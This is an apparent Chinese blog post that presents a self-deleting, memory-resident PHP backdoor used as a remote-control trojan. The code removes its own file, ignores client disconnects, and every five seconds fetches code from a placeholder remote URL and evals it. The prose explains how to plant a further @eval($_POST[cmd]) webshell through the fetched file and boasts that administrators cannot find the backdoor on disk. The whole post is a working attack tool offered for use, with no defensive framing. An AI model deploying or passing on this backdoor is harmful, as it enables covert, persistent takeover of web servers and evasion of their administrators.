一个非常淫荡的php后门,当远控使用
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>
后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部连接
在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码
例如txt里面写了一句这样的代码 file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");
这样就会在目录下又生成一个木马
如果对方写了是执行命令 ,这段代码纯粹变成了一个等待命令的木马。。
而且管理员检查木马文件的时候 都找不到。。。因为文件已经删除了。木马却注入在php-fpm内
sleep(5); 五秒就去远程读取一下指令
停止执行:删除或清空 webshel.txt。
缺点:服务器或WEB容器一重启后门就没了。
声明:
作者:ssooking 联系邮箱:c3Nvb2tpbmdAeWVhaC5uZXQ=
若无特殊说明,所发博文皆为原创,转载请务必注明出处、保留原文地址。欢迎交流分享!如果您有任何问题,请联系我!
作者:ssooking 联系邮箱:c3Nvb2tpbmdAeWVhaC5uZXQ=
若无特殊说明,所发博文皆为原创,转载请务必注明出处、保留原文地址。欢迎交流分享!如果您有任何问题,请联系我!

浙公网安备 33010602011771号